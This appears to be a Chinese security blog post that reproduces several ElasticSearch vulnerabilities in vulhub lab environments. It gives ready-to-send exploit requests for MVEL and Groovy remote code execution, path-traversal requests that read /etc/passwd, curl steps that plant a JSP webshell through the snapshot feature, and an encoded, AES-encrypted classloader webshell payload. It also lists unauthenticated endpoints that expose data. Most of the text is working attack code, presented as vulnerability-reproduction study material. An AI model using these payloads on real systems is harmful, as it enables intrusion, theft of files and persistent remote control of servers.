ElasticSearch漏洞复现集合-技术圈

作者：巧克力威化饼 编辑：白帽子社区运营团队

"白帽子社区在线CTF靶场BMZCTF，欢迎各位在这里练习、学习，BMZCTF全身心为网络安全赛手提供优质学习环境，链接（http://www.bmzclub.cn/）

简介

ElasticSearch 是一款Java编写的企业级搜索服务，启动此服务默认会开放HTTP-9200端口，如存在相关漏洞，可被攻击者非法操作数据。

基本概念

Elasticsearch是面向文档型数据库，一条数据在这里就是一个文档，用JSON作为文档序列化的格式，比如下面这条用户数据

{    "name" :     "John",    "sex" :      "Male",    "age" :      25,    "birthDate": "1990/05/01",    "about" :    "I love to go rock climbing","interests": [ "sports", "music" ]}

环境搭建

Docker安装：https://www.runoob.com/docker/centos-docker-install.html

下载vulhub：git clone https://github.com/vulhub/vulhub.git

对靶场进行编译：docker-compose build

运行靶场：docker-compose up -d

关闭镜像：docker-compose down

CVE-2014-3120远程代码执行

原理

老版本ElasticSearch支持传入动态脚本（MVEL）来执行一些复杂的操作，而MVEL可执行Java代码，而且没有沙盒，所以攻击者可以直接执行任意代码。

MVEL执行命令的代码如下：

import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec("id").getInputStream()).useDelimiter("\\A").next();

影响版本

v1.1.1

复现

访问环境

该漏洞需要es中至少存在一条数据，所以我们需要先创建一条数据

POST /website/blog/ HTTP/1.1Host: yourip:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 25
{  "name": "ceshi"}

然后就可以执行任意代码了

POST /_search?pretty HTTP/1.1Host: your-ip:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 343
{    "size": 1,    "query": {      "filtered": {        "query": {          "match_all": {          }        }      }    },    "script_fields": {        "command": {            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"        }    }}

后续反弹shell需要进行编码

编码网址：http://www.jackson-t.ca/runtime-exec-payloads.html

成功得到shell

CVE-2015-1427远程代码执行

原理

CVE-2014-3120后，ElasticSearch默认的动态脚本语言换成了Groovy，并增加了沙盒，但默认仍然支持直接执行动态语言。本漏洞既是一个沙盒绕过，也是一个Goovy代码执行漏洞。

复现

访问环境

由于查询时至少要求es中有一条数据，所以发送如下数据包，增加一个数据：

POST /website/blog/ HTTP/1.1Host: your-ip:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 25
{  "name": "ceshi"}

然后发送包含payload的数据包，执行任意命令。

POST /_search?pretty HTTP/1.1Host: your-ip:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/textContent-Length: 156
{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getText()"}}}

通过编码得到反弹shell

CVE-2015-3337目录穿越漏洞

原理

在安装了具有“site”功能的插件以后，插件目录使用../即可向上跳转，导致目录穿越漏洞，可读取任意文件。没有安装任意插件的elasticsearch不受影响。

影响版本

1.4.5以下/1.5.2以下

复现

访问环境

head插件提供了elasticsearch的前端页面，访问 http://your-ip:9200/_plugin/head/ 即可看到

该漏洞插件好像已下架，未找到下载地址

POC：
GET /_plugin/head/../../../../../../../../../etc/passwd HTTP/1.1Host: your-ip:9200Accept:*/*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0Connection: close

CVE-2015-5531目录穿越漏洞

原理

此漏洞利用ES的备份功能，快照本应该是文件，但ES没有对快照是否是文件进行验证，遇到目录就递归读取文件的内容从而导致目录遍历。

影响版本

1.6.1以下

复现

访问环境

使用PUT请求，创建一个仓库

PUT /_snapshot/ceshi HTTP/1.1Host: yourip:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 109
{    "type": "fs",    "settings": {        "location": "/usr/share/elasticsearch/repo/ceshi"    }}

使用同样方法创建一个快照

PUT /_snapshot/ceshi2 HTTP/1.1Host: yourIP:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 126
{    "type": "fs",    "settings": {        "location": "/usr/share/elasticsearch/repo/ceshi/snapshot-backdata"    }}

访问http://yourIP:9200/_snapshot/ceshi/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

可通过google控制台将编码值解码

在控制台输入String.fromCharCode(Unicode 数字编码) // fromCharCode() 可接受一个指定的 Unicode 值，然后返回一个字符串

Elasticsearch写入webshell漏洞（Wooyun-2015-110216）

原理

ElasticSearch具有备份数据的功能，用户可以传入一个路径，让其将数据备份到该路径下，且文件名和后缀都可控。所以，如果同文件系统下还跑着其他服务，如Tomcat、PHP等，我们可以利用ElasticSearch的备份功能写入一个webshell。

和CVE-2015-5531类似，该漏洞和备份仓库有关。在elasticsearch1.5.1以后，其将备份仓库的根路径限制在配置文件的配置项path.repo中，而且如果管理员不配置该选项，则默认不能使用该功能。即使管理员配置了该选项，web路径如果不在该目录下，也无法写入webshell。所以该漏洞影响的ElasticSearch版本是1.5.x以前。

影响版本

1.5.x以前

复现

访问环境

开始写入webshell时，首先需要了解网站的绝对路径，创建一个恶意索引文档后，并在终端执行如下命令

curl -XPOST http://ip:9200/yz.jsp/yz.jsp/1 -d'{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"}'

再创建一个恶意的存储库，其中location的值即为将要写入的路径

curl -XPUT 'http://ip:9200/_snapshot/yz.jsp' -d '{     "type": "fs",     "settings": {          "location": "/usr/local/tomcat/webapps/wwwroot/",          "compress": false     }}'

存储库验证并创建:

curl -XPUT "http://ip:9200/_snapshot/yz.jsp/yz.jsp" -d '{     "indices": "yz.jsp",     "ignore_unavailable": "true",     "include_global_state": false}'

访问http://IP:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp，这就是我们写入的webshell

该shell的作用是向wwwroot下的test.jsp文件中写入任意字符串，参数为f,此处的shell要进行部分url编码，不然会连接不成功。

http://192.168.187.136:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp?f=%3c%25%40page+import%3d%22java.util.*%2cjavax.crypto.*%2cjavax.crypto.spec.*%22%25%3e%3c%25!class+U+extends+ClassLoader%7bU(ClassLoader+c)%7bsuper(c)%3b%7dpublic+Class+g(byte+%5b%5db)%7breturn+super.defineClass(b%2c0%2cb.length)%3b%7d%7d%25%3e%3c%25if(request.getParameter(%22pass%22)!%3dnull)%7bString+k%3d(%22%22%2bUUID.randomUUID()).replace(%22-%22%2c%22%22).substring(16)%3bsession.putValue(%22u%22%2ck)%3bout.print(k)%3breturn%3b%7dCipher+c%3dCipher.getInstance(%22AES%22)%3bc.init(2%2cnew+SecretKeySpec((session.getValue(%22u%22)%2b%22%22).getBytes()%2c%22AES%22))%3bnew+U(this.getClass().getClassLoader()).g(c.doFinal(new+sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext)%3b%25%3e

未授权访问敏感信息

/_cat/_cat/indices/_plugin/head/ web管理界面/_plugin/sql//_nodes   查看节点数据/_river/_search 查看数据库敏感信息/_search/_search?preety/_status

往期精彩文章

2021年“春秋杯”新年欢乐赛WP

BMZCTF刷题集锦

linux下的凭据窃取

jumpserver RCE复现（附带POC）

技术支持：白帽子社区团队

— 扫码关注我们 —